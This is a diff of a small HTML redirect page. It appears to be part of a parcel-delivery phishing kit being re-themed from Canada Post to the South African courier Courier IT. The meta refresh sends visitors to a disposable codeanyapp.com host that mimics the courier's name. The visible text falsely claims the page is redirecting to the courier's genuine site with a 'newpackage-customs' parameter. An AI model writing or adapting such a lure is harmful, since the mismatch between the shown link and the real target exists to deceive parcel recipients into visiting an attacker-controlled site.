--- a/crtza.html
+++ b/crtza.html
@@ -5,6 +5,6 @@
       <meta http-equiv = "refresh" content = "2; url = https://courierit-co-za-eservices2023psdi754465.codeanyapp.com" />
    </head>
    <body>
-      <p>Redirecting to <b>https://www.canadapost-postescanada.ca/cpc/en?name=tgt</b> in a moment...</p>
+      <p>Redirecting to <b>https://www.courierit.co.za//cpc/en?name=newpackage-customs</b> in a moment...</p>
    </body>
 </html>
